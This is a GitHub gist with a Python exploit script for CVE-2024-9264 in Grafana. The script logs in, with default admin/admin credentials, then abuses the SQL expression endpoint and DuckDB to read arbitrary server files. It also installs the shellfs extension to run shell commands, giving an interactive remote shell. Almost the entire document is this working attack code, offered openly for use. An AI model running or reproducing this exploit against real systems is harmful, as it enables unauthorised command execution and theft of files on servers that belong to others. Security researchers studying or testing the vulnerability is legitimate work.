Created
May 19, 2025 15:29
-
-
Save henriquetorquato/cf57586d8a8f85aede76b99d62f8896d to your computer and use it in GitHub Desktop.
CVE-2024-9264 - Interactive Shell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
# This code is heavily based on (literally copied from):
# https://github.com/nollium/CVE-2024-9264/tree/main
# | |
# - Requirements (install with pip): | |
# ten | |
# psycopg2-binary | |
from ten import * | |
from tenlib.flow.console import get_console | |
from typing import cast, List, Dict, Optional, Any | |
from psycopg2.extensions import adapt | |
import sys | |
# Route ten's console messages to stderr so that stdout can be redirected on
# its own, separately from the message log.
# E.g: python3 CVE-2024-9264.py -f /etc/passwd http://localhost:3000 > file.txt 2> logs.txt
console = get_console()
console.stderr = True
@inform("Logging in with provided or default credentials")
def authenticate(session: ScopedSession, user: str, password: str) -> None:
    """Log in through the ``/login`` endpoint using *session*.

    The credentials are posted as a JSON body and the ``message`` field of
    the JSON reply is inspected: ``"Logged in"`` is reported with
    ``msg_success``; any other value is reported with ``failure``.

    Args:
        session: Session used to send the request.
        user: Username to log in as.
        password: Password for ``user``.
    """
    credentials = {"password": password, "user": user}
    response = session.post("/login", json=credentials)
    logged_in = response.json()["message"] == "Logged in"
    if not logged_in:
        failure(f"Failed to log in as {user}:{password}")
    else:
        msg_success(f"Logged in as {user}:{password}")
@inform("Running duckdb query")
def run_query(session: ScopedSession, query: str) -> Optional[List[Any]]:
    """Submit *query* as an SQL expression and return the resulting values.

    The query is posted to ``/api/ds/query`` under ``refId`` ``"B"`` and the
    ``values`` of the first frame of that result are returned.

    Args:
        session: Session used to send the request.
        query: SQL text placed in the ``expression`` field of the request.

    Returns:
        The ``values`` list of the first frame, or ``None`` when the reply
        carries an error, a top-level ``message``, an empty ``values`` list,
        or does not have the expected structure.
    """
    endpoint = "/api/ds/query?ds_type=__expr__&expression=true&requestId=Q101"
    expression_source = {
        "name": "Expression",
        "type": "__expr__",
        "uid": "__expr__",
    }
    sql_expression = {
        "datasource": expression_source,
        "expression": query,
        "hide": False,
        "refId": "B",
        "type": "sql",
        "window": "",
    }
    payload = {
        "from": "1729313027261",
        "queries": [sql_expression],
        "to": "1729334627261",
    }
    reply = cast(Dict, session.post(endpoint, json=payload).json())

    # A "no such file or directory" error on result "B" is treated as the
    # DuckDB binary being absent on the target.
    if "results" in reply and "B" in reply["results"]:
        ref_b = reply["results"]["B"]
        if "error" in ref_b and "no such file or directory" in ref_b["error"]:
            failure("DuckDB is not installed on the target system. This exploit requires DuckDB to be present in the system PATH.")
            return None

    # A non-empty top-level "message" means the request itself was not
    # answered with query results; dump the whole reply for inspection.
    if reply.get("message"):
        msg_failure("Received unexpected response:")
        msg_failure(json.encode(reply, indent=4))  # prettify json
        return None

    try:
        frame_values = cast(List, reply["results"]["B"]["frames"][0]["data"]["values"])
        if len(frame_values) == 0:
            failure("File not found")
            return None
        return frame_values
    except (KeyError, IndexError):
        msg_failure("Unexpected response format:")
        msg_failure(json.encode(reply, indent=4))
        return None
# Output's non-printable characters are unicode escaped
def decode_output(values: List[List[str]]) -> bytes:
    """Convert the first cell of a query result back into raw bytes.

    The cell is expected to be text in which non-printable bytes appear as
    backslash escapes (e.g. ``\\x00``, ``\\n``). The escapes are expanded with
    the ``unicode_escape`` codec and the resulting code points are mapped
    one-to-one onto bytes via ``latin1``.

    Args:
        values: Nested list as returned by ``run_query``; only
            ``values[0][0]`` is read.

    Returns:
        The decoded bytes, or ``b""`` when the result holds no cell at all
        (``[]`` or ``[[]]``) instead of raising ``IndexError``.
    """
    # An empty outer list, or a first list with no entries, has nothing to
    # decode.
    if not values or not values[0]:
        return b""
    escaped = values[0][0]
    return escaped.encode("utf-8").decode("unicode_escape").encode("latin1")
def read_remote_file(session: ScopedSession, filepath: str) -> Optional[bytes]:
    """Read a file from the remote server using read_blob.

    Args:
        session: Session passed through to ``run_query``.
        filepath: Path of the file to read; quoted with ``adapt`` before
            being placed in the query.

    Returns:
        The decoded file content, or ``None`` when ``run_query`` yields
        nothing.
    """
    quoted_path = adapt(filepath)
    rows = run_query(session, f"SELECT content FROM read_blob({quoted_path})")
    return decode_output(rows) if rows else None
def execute_command(session: ScopedSession, command: str) -> Optional[bytes]:
    """Execute a command and return its output using shellfs.

    The command's stdout and stderr are redirected to a fixed temporary file,
    which is then fetched with ``read_remote_file``.

    Args:
        session: Session passed through to ``run_query``.
        command: Command text; inserted verbatim inside a single-quoted SQL
            string, so a ``'`` in it terminates that literal early.

    Returns:
        Whatever ``read_remote_file`` returns for the temporary file.
    """
    output_path = "/tmp/grafana_cmd_output"
    statements = [
        "SELECT 1",
        # Install and load shellfs before using it
        "install shellfs from community",
        "LOAD shellfs",
        # Run the command with its output redirected to the temporary file
        f"SELECT * FROM read_csv('{command} >{output_path} 2>&1 |')",
    ]
    run_query(session, ";".join(statements))
    # Read the output file using the common function
    return read_remote_file(session, output_path)
@entry
@arg("url", "URL of the Grafana instance to exploit")
@arg("user", "Username to log in as, defaults to 'admin'")
@arg("password", "Password used to log in, defaults to 'admin'")
def main(url, user="admin", password="admin", file=None, query=None, command=None):
    """Authenticate, then run an interactive ``$ `` prompt loop.

    Each non-empty line read from stdin is passed to ``execute_command`` and
    its output is printed with ``bin_print``. The loop ends on end-of-file or
    when the line is ``exit`` (case-insensitive).

    Args:
        url: Base URL of the instance; a trailing ``/`` is stripped.
        user: Username used to log in.
        password: Password used to log in.
        file: Unused by this function; kept for interface compatibility.
        query: Unused by this function; kept for interface compatibility.
        command: Unused by this function; kept for interface compatibility.
    """
    session = ScopedSession(base_url=url.rstrip('/'))
    authenticate(session, user, password)
    while True:
        try:
            line = input("$ ").strip()
        except EOFError:
            # Finish the prompt line before leaving on Ctrl-D / end of input.
            print()
            break
        if not line:
            continue
        # Compare against a string: the previous comparison with a list
        # (["exit"]) was always False, so "exit" never left the loop.
        if line.lower() == "exit":
            break
        output = execute_command(session, line)
        # execute_command is Optional[bytes]; skip printing when no output
        # could be retrieved.
        if output is not None:
            bin_print(output)
# Script entry: arguments are not passed explicitly here, hence the pylint
# suppression on the call.
main()  # pylint: disable=no-value-for-parameter
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment